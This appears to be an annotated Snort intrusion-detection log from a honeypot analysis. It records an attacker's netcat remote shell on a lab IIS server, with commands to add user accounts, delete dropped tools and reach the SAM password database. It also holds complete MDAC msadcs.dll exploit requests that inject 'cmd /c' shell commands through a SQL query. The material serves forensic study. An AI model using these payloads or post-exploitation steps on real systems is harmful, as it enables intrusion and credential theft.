***AP*** Seq: 0x2CBF3A24 Ack: 0x9E44003C Win: 0x1D15 TcpLen: 20
net users /?..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:24.647619 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:62076 IpLen:20 DgmLen:323 DF
***AP*** Seq: 0x2CBF3A32 Ack: 0x9E44003C Win: 0x1D15 TcpLen: 20
The syntax of this command is:.......NET USER [username [passwor
d | *] [options]] [/DOMAIN].. username {password | *} /A
DD [options] [/DOMAIN].. username [/DELETE] [/DOMAIN]...
...C:\Program Files\Common Files\System\msadc>..C:\Program Files
\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# tries to add another user 'hi' pwd 'guy' from remote shell. This fails. system error 1312
[**] netcat session 6969 [**]
02/04-06:00:36.390263 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:381 IpLen:20 DgmLen:63 DF
***AP*** Seq: 0x2CBF3B4D Ack: 0x9E440053 Win: 0x1CFE TcpLen: 20
net users hi guy /ADD..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:36.876595 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:637 IpLen:20 DgmLen:254 DF
***AP*** Seq: 0x2CBF3B64 Ack: 0x9E440053 Win: 0x1CFE TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\Program Files\Common Files\System\msadc>..C:\Program Files\Comm
on Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:43.950510 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:2173 IpLen:20 DgmLen:206 DF
***AP*** Seq: 0x2CBF3C3A Ack: 0x9E44005B Win: 0x1CF6 TcpLen: 20
/net....The filename, directory name, or volume label syntax is
incorrect.....C:\Program Files\Common Files\System\msadc>..C:\Pr
ogram Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:52.311128 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4989 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBF3CE0 Ack: 0x9E44006C Win: 0x1CE5 TcpLen: 20
netnet password..The name specified is not recognized as an..int
ernal or external command, operable program or batch file.....C:
\Program Files\Common Files\System\msadc>..C:\Program Files\Comm
on Files\
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:52.802289 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:5245 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBF3DA9 Ack: 0x9E44006C Win: 0x1CE5 TcpLen: 20
System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:01:11.138310 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7293 IpLen:20 DgmLen:50 DF
***AP*** Seq: 0x2CBF3DB6 Ack: 0x9E440076 Win: 0x1CDB TcpLen: 20
net user..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:01:11.626415 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7549 IpLen:20 DgmLen:393 DF
***AP*** Seq: 0x2CBF3DC0 Ack: 0x9E440076 Win: 0x1CDB TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\Program Files\Common Files\System\msadc>..C:\Program
Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:01:14.849464 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9341 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBF3F21 Ack: 0x9E440083 Win: 0x1CCE TcpLen: 20
net user /?..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:01:15.322342 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9597 IpLen:20 DgmLen:323 DF
***AP*** Seq: 0x2CBF3F2E Ack: 0x9E440083 Win: 0x1CCE TcpLen: 20
The syntax of this command is:.......NET USER [username [passwor
d | *] [options]] [/DOMAIN].. username {password | *} /A
DD [options] [/DOMAIN].. username [/DELETE] [/DOMAIN]...
...C:\Program Files\Common Files\System\msadc>..C:\Program Files
\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:01:36.576987 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15741 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF4049 Ack: 0x9E4400A2 Win: 0x1CAF TcpLen: 20
net user himan HarHar666 /ADD..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to add another account (himan / HarHar666) using the remote shell. This fails.
[**] netcat session 6969 [**]
02/04-06:01:37.051478 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15997 IpLen:20 DgmLen:254 DF
***AP*** Seq: 0x2CBF4068 Ack: 0x9E4400A2 Win: 0x1CAF TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\Program Files\Common Files\System\msadc>..C:\Program Files\Comm
on Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:02:55.297924 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:19581 IpLen:20 DgmLen:50 DF
***AP*** Seq: 0x2CBF413E Ack: 0x9E4400AC Win: 0x1CA5 TcpLen: 20
net name..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs 'net name' command from remote shell
[**] netcat session 6969 [**]
02/04-06:02:55.756158 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:19837 IpLen:20 DgmLen:307 DF
***AP*** Seq: 0x2CBF4148 Ack: 0x9E4400AC Win: 0x1CA5 TcpLen: 20
..Name ..--------------------------------------------
-----------------------------------..LAB ..ADMINISTR
ATOR ..The command completed successfully........C:\Program Fi
les\Common Files\System\msadc>..C:\Program Files\Common Files\Sy
stem\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:03:14.723932 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:21885 IpLen:20 DgmLen:50 DF
***AP*** Seq: 0x2CBF4253 Ack: 0x9E4400B6 Win: 0x1C9B TcpLen: 20
net user..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:03:15.181429 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:22141 IpLen:20 DgmLen:393 DF
***AP*** Seq: 0x2CBF425D Ack: 0x9E4400B6 Win: 0x1C9B TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\Program Files\Common Files\System\msadc>..C:\Program
Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:03:21.630777 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23677 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x2CBF43BE Ack: 0x9E4400CE Win: 0x2238 TcpLen: 20
net user Administrator..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
'Tries to run 'net user Administrator' from remote shell. This fails (system error 1312)
[**] netcat session 6969 [**]
02/04-06:03:22.105133 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23933 IpLen:20 DgmLen:254 DF
***AP*** Seq: 0x2CBF43D6 Ack: 0x9E4400CE Win: 0x2238 TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\Program Files\Common Files\System\msadc>..C:\Program Files\Comm
on Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:05.982766 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28797 IpLen:20 DgmLen:182 DF
***AP*** Seq: 0x2CBF44AC Ack: 0x9E4400D9 Win: 0x222D TcpLen: 20
cd /winnt..The syntax of the command is incorrect.....C:\Program
Files\Common Files\System\msadc>..C:\Program Files\Common Files
\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:06.884215 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29309 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF453A Ack: 0x9E4400DE Win: 0x2228 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\System\
msadc....02/04/01 06:43a ...02/04/01 06:
43a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:07.431721 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29565 IpLen:20 DgmLen:912 DF
***AP*** Seq: 0x2CBF4602 Ack: 0x9E4400DE Win: 0x2228 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..09/25/97 08:28a
172,816 msadce.dll..09/25/97 08:16a
5,632 msadcer.dll..09/25/97 08:24a 23,312 msa
dcf.dll..09/25/97 08:24a 91,408 msadco.dll..09/2
5/97 08:19a 5,120 msadcor.dll..09/26/97 08:19a
42,256 msadcs.dll..02/04/01 06:41a
59,392 nc.exe..02/04/01 06:41a 32,768 pdump.e
xe..10/02/97 07:28a 19,388 readme.txt..02/04/01
06:41a 36,864 samdump.dll.. 15 File
(s) 698,285 bytes.. 1,690,852,86
4 bytes free....C:\Program Files\Common Files\System\msadc>..C:\
Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:11.991372 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:31613 IpLen:20 DgmLen:73 DF
***AP*** Seq: 0x2CBF496A Ack: 0x9E4400E9 Win: 0x221D TcpLen: 20
cd \winnt....C:\WINNT>..C:\WINNT>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:18.000392 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32637 IpLen:20 DgmLen:177 DF
***AP*** Seq: 0x2CBF498B Ack: 0x9E440118 Win: 0x21EE TcpLen: 20
cd C:\Program Files\Common Files\System\msadc....C:\Program File
s\Common Files\System\msadc>..C:\Program Files\Common Files\Syst
em\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:24.459833 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33917 IpLen:20 DgmLen:198 DF
***AP*** Seq: 0x2CBF4A14 Ack: 0x9E44011F Win: 0x21E7 TcpLen: 20
del c..Could Not Find C:\Program Files\Common Files\System\msadc
\c....C:\Program Files\Common Files\System\msadc>..C:\Program Fi
les\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to cleanup files in 'C:\Program Files\Common Files\System\msadc'
!@# Deletes pdump.exe, samdump.dll and pdump.exe
[**] netcat session 6969 [**]
02/04-06:05:27.814657 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:35709 IpLen:20 DgmLen:147 DF
***AP*** Seq: 0x2CBF4AB2 Ack: 0x9E440130 Win: 0x21D6 TcpLen: 20
del samdump.dll....C:\Program Files\Common Files\System\msadc>..
C:\Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:31.219668 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37501 IpLen:20 DgmLen:145 DF
***AP*** Seq: 0x2CBF4B1D Ack: 0x9E44013F Win: 0x21C7 TcpLen: 20
del pdump.exe....C:\Program Files\Common Files\System\msadc>..C:
\Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:36.878005 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38269 IpLen:20 DgmLen:177 DF
***AP*** Seq: 0x2CBF4B86 Ack: 0x9E440145 Win: 0x21C1 TcpLen: 20
del ..The syntax of the command is incorrect.....C:\Program File
s\Common Files\System\msadc>..C:\Program Files\Common Files\Syst
em\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:40.633348 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39805 IpLen:20 DgmLen:72 DF
***AP*** Seq: 0x2CBF4C0F Ack: 0x9E44014F Win: 0x21B7 TcpLen: 20
cd\winnt....C:\WINNT>..C:\WINNT>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:42.936881 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:41085 IpLen:20 DgmLen:141 DF
***AP*** Seq: 0x2CBF4C2F Ack: 0x9E44015A Win: 0x21AC TcpLen: 20
cd resp....The filename, directory name, or volume label syntax
is incorrect.....C:\WINNT>..C:\WINNT>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Navigates remote shell to 'C:\WINNT\repair\'. Going for the SAM
[**] netcat session 6969 [**]
02/04-06:05:44.839517 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42109 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x2CBF4C94 Ack: 0x9E440165 Win: 0x21A1 TcpLen: 20
cd repair....C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:46.041637 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42877 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF4CC3 Ack: 0x9E44016A Win: 0x219C TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....11/26/00 06:43p
...11/26/00 06:43p .
...10/13
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:46.583109 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:43133 IpLen:20 DgmLen:620 DF
***AP*** Seq: 0x2CBF4D8B Ack: 0x9E44016A Win: 0x219C TcpLen: 20
/96 07:38p 438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p
15,677 default._..11/26/00 06:43p 14,946 ntuser
.da_..11/26/00 06:43p 4,593 sam._..11/26/00 06
:43p 6,066 security._..11/26/00 06:54p
50,405 setup.log..11/26/00 06:43p 124,776
software._..11/26/00 06:43p 80,874 system._..
11 File(s) 300,285 bytes..
1,690,922,496 bytes free....C:\WINNT\repair>..C:\WINNT\rep
air>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs rdisk -s/ to try to update this copy of the SAM db from the remote shell.
[**] netcat session 6969 [**]
02/04-06:05:51.449246 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:44669 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF4FCF Ack: 0x9E440175 Win: 0x2191 TcpLen: 20
rdisk -s/..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:51.909627 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:44925 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x2CBF4FDA Ack: 0x9E440175 Win: 0x2191 TcpLen: 20
..C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:55.155196 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:46461 IpLen:20 DgmLen:189 DF
***AP*** Seq: 0x2CBF4FFE Ack: 0x9E44017B Win: 0x218B TcpLen: 20
d.rd..The name specified is not recognized as an..internal or ex
ternal command, operable program or batch file.....C:\WINNT\repa
ir>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:59.310848 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:47997 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x2CBF5093 Ack: 0x9E440186 Win: 0x2180 TcpLen: 20
rdisk -/s....C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs rdisk -/s
[**] netcat session 6969 [**]
02/04-06:06:00.763248 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:48765 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF50C2 Ack: 0x9E44018B Win: 0x217B TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....11/26/00 06:43p
...11/26/00 06:43p .
...10/13
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:01.311033 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:49021 IpLen:20 DgmLen:620 DF
***AP*** Seq: 0x2CBF518A Ack: 0x9E44018B Win: 0x217B TcpLen: 20
/96 07:38p 438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p
15,677 default._..11/26/00 06:43p 14,946 ntuser
.da_..11/26/00 06:43p 4,593 sam._..11/26/00 06
:43p 6,066 security._..11/26/00 06:54p
50,405 setup.log..11/26/00 06:43p 124,776
software._..11/26/00 06:43p 80,874 system._..
11 File(s) 300,285 bytes..
1,690,922,496 bytes free....C:\WINNT\repair>..C:\WINNT\rep
air>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# runs rdisk
[**] netcat session 6969 [**]
02/04-06:06:06.270993 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:49789 IpLen:20 DgmLen:83 DF
***AP*** Seq: 0x2CBF53CE Ack: 0x9E440192 Win: 0x2174 TcpLen: 20
rdisk....C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# then runs rdisk -s
[**] netcat session 6969 [**]
02/04-06:06:09.776270 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51581 IpLen:20 DgmLen:86 DF
***AP*** Seq: 0x2CBF53F9 Ack: 0x9E44019C Win: 0x216A TcpLen: 20
rdisk -s....C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:10.779103 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:52093 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF5427 Ack: 0x9E4401A1 Win: 0x2165 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....11/26/00 06:43p
...11/26/00 06:43p .
...10/13
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Looking at the timestamps in the directory listing it does not appear that any of these worked.
[**] netcat session 6969 [**]
02/04-06:06:11.335085 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:52349 IpLen:20 DgmLen:620 DF
***AP*** Seq: 0x2CBF54EF Ack: 0x9E4401A1 Win: 0x2165 TcpLen: 20
/96 07:38p 438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p
15,677 default._..11/26/00 06:43p 14,946 ntuser
.da_..11/26/00 06:43p 4,593 sam._..11/26/00 06
:43p 6,066 security._..11/26/00 06:54p
50,405 setup.log..11/26/00 06:43p 124,776
software._..11/26/00 06:43p 80,874 system._..
11 File(s) 300,285 bytes..
1,690,922,496 bytes free....C:\WINNT\repair>..C:\WINNT\rep
air>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:15.734998 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:53373 IpLen:20 DgmLen:189 DF
***AP*** Seq: 0x2CBF5733 Ack: 0x9E4401A7 Win: 0x215F TcpLen: 20
cat ..The name specified is not recognized as an..internal or ex
ternal command, operable program or batch file.....C:\WINNT\repa
ir>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Attempts to read sam in remote shell and sees this shell is not priviledged.
[**] netcat session 6969 [**]
02/04-06:06:19.890923 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54909 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBF57C8 Ack: 0x9E4401B3 Win: 0x2153 TcpLen: 20
type sam._..Access is denied.....C:\WINNT\repair>..C:\WINNT\repa
ir>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run rdisk -/s
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:06:32.383142 213.116.251.162:1964 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13562 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB3AA6A94 Ack: 0x2CD45E6D Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. .-./.s.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run rdisk -s
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:06:38.240958 213.116.251.162:1966 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13574 IpLen:20 DgmLen:723 DF
***AP*** Seq: 0xB3C24085 Ack: 0x2CD475BE Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 529..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 320..........~...S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. .-.s.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t.
.A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i
.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t
.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run rdisk
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:06:42.283638 213.116.251.162:1968 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13585 IpLen:20 DgmLen:717 DF
